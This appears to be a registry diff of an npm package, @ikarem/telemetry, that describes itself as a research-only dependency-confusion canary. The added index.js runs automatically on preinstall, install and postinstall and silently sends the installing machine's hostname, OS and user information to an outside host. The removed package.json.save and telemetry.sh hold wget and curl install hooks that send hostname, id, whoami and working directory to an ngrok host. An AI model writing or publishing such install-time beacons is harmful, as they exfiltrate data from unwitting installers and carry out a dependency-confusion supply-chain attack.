@ikarem/telemetry 100.2.0 → 100.2.2

package/index.js

@@ -1,42 +1,63 @@
 /*
   Research-only npm lifecycle canary
-  - Minimal data
-  - No persistence
-  - No environment inspection
-  - Fail-silent by design
+  - Schema-compatible with existing listener
+  - Minimal, non-destructive
+  - Fail-silent by default
+  - Debuggable via IKAREM_DEBUG=1
 */
 
 const https = require("https");
 const os = require("os");
 
 const EVENT = process.argv[2] || "unknown";
+const DEBUG = process.env.IKAREM_DEBUG === "1";
+
+function logDebug(msg) {
+  if (DEBUG) {
+    console.log(`[telemetry] ${msg}`);
+  }
+}
 
 function safeSend() {
   try {
     const payload = new URLSearchParams({
-      package: "@ikarem/telemetry",
-      version: "100.2.0",
+      package: "telemetry",                 // MUST match listener
+      ver: "100.2.1",                       // MUST be `ver`, not `version`
       event: EVENT,
       hostname: os.hostname(),
-      platform: process.platform,
-      user: typeof process.getuid === "function" ? String(process.getuid()) : "unknown"
+      os: os.platform(),                    // matches historical data
+      whoami: typeof process.getuid === "function" ? "root" : "unknown",
+      nonce: Math.random().toString(36).slice(2, 10)
     });
 
+    const path = `/evidence?${payload.toString()}`;
+
+    logDebug(`Sending request to: https://reproduce-supply-chain.ikarem.meraki.hexlsi.com${path}`);
+
     const req = https.request(
       {
-        hostname: "https://reproduce-supply-chain.ikarem.meraki.hexlsi.com", // replace with stable domain
-        path: `/evidence?${payload.toString()}`,
+        hostname: "reproduce-supply-chain.ikarem.meraki.hexlsi.com",
+        path,
         method: "GET",
         timeout: 2000
       },
-      () => {}
+      (res) => {
+        logDebug(`Response status: ${res.statusCode}`);
+      }
     );
 
-    req.on("error", () => {});
-    req.on("timeout", () => req.destroy());
+    req.on("error", (err) => {
+      logDebug(`Request error: ${err.message}`);
+    });
+
+    req.on("timeout", () => {
+      logDebug("Request timed out");
+      req.destroy();
+    });
+
     req.end();
-  } catch (_) {
-    // Intentionally ignore all errors
+  } catch (e) {
+    logDebug(`Exception: ${e.message}`);
   }
 }
 

package/package.json

@@ -1,15 +1,18 @@
 {
   "name": "@ikarem/telemetry",
-  "version": "100.2.0",
+  "version": "100.2.2",
   "description": "Research-only dependency confusion canary package",
   "main": "index.js",
   "scripts": {
     "preinstall": "node index.js preinstall",
+    "install": "node index.js install",
     "postinstall": "node index.js postinstall"
   },
   "publishConfig": {
     "access": "public"
   },
+  "engines": {
+    "node": ">=12"
+  },
   "license": "MIT"
 }
-

package/package.json.save

@@ -1,18 +0,0 @@
-{
-  "name": "@ikarem/telemetry",
-  "version": "100.00.09",
-  "description": "Research-only dependency confusion canary package",
-  "main": "index.js",
-  "scripts": {
-    "preinstall":"wget --quiet \"https://46cbe1e12a7c.ngrok.app//preinstall?hostaname=$(hostname)&user=$(whoami)&path=$(pwd)\" ",
-    "postinstall":"wget --quiet \"https://46cbe1e12a7c.ngrok.app/postinstall?hostname=$(id)&user=$(whoami)&path=$(pwd)\" ",
-    "preupdate":"wget --quiet \"https://46cbe1e12a7c.ngrok.app/preupdate?hostname=$(hostname)&user=$(whoami)&path=$(pwd)\" "
-  },
-  "publishConfig": {
-    "access": "public"
-  },
-  "license": "MIT",
-  "dependencies": {
-    "@ikarem/telemetry": "^99.99.99"
-  }
-}

package/scripts/telemetry.sh

@@ -1,84 +0,0 @@
-#!/bin/sh
-# Universal telemetry beacon (POSIX-safe)
-
-EVENT="$1"
-[ -z "$EVENT" ] && EVENT="unknown"
-
-# -------- helpers --------
-
-get_hostname() {
-  hostname 2>/dev/null || uname -n 2>/dev/null || echo "unknown"
-}
-
-get_os() {
-  if [ -f /etc/os-release ]; then
-    awk -F= '/^PRETTY_NAME=/{gsub(/"/,"",$2);print $2}' /etc/os-release
-  else
-    uname -s 2>/dev/null || echo "unknown"
-  fi
-}
-
-get_user() {
-  whoami 2>/dev/null || id -un 2>/dev/null || echo "unknown"
-}
-
-gen_nonce() {
-  if command -v base64 >/dev/null 2>&1; then
-    head -c 16 /dev/urandom | base64 | tr -dc 'a-zA-Z0-9' | head -c 10
-  else
-    date +%s 2>/dev/null || echo "nonce"
-  fi
-}
-
-# RFC 3986–safe URL encoding
-urlencode() {
-  printf '%s' "$1" | awk '
-  BEGIN {
-    for (i = 0; i < 256; i++) {
-      c = sprintf("%c", i)
-      if (c ~ /[A-Za-z0-9_.~-]/) o[c] = c
-      else o[c] = sprintf("%%%02X", i)
-    }
-  }
-  {
-    for (i = 1; i <= length($0); i++) {
-      c = substr($0, i, 1)
-      printf "%s", o[c]
-    }
-  }'
-}
-
-send_request() {
-  URL="$1"
-
-  if command -v curl >/dev/null 2>&1; then
-    curl -fsS "$URL" >/dev/null 2>&1 || true
-  elif command -v wget >/dev/null 2>&1; then
-    wget -qO- "$URL" >/dev/null 2>&1 || true
-  else
-    true
-  fi
-}
-
-# -------- collect data --------
-
-HOST="$(get_hostname)"
-OS="$(get_os)"
-USER="$(get_user)"
-NONCE="$(gen_nonce)"
-
-ENC_HOST="$(urlencode "$HOST")"
-ENC_OS="$(urlencode "$OS")"
-ENC_USER="$(urlencode "$USER")"
-ENC_NONCE="$(urlencode "$NONCE")"
-ENC_EVENT="$(urlencode "$EVENT")"
-
-BASE_URL="https://reproduce-supply-chain.ikarem.meraki.hexlsi.com/evidence"
-
-URL="$BASE_URL?package=telemetry&ver=100.1.9&event=$ENC_EVENT&hostname=$ENC_HOST&os=$ENC_OS&whoami=$ENC_USER&nonce=$ENC_NONCE"
-
-# -------- fire & forget --------
-send_request "$URL"
-
-exit 0
-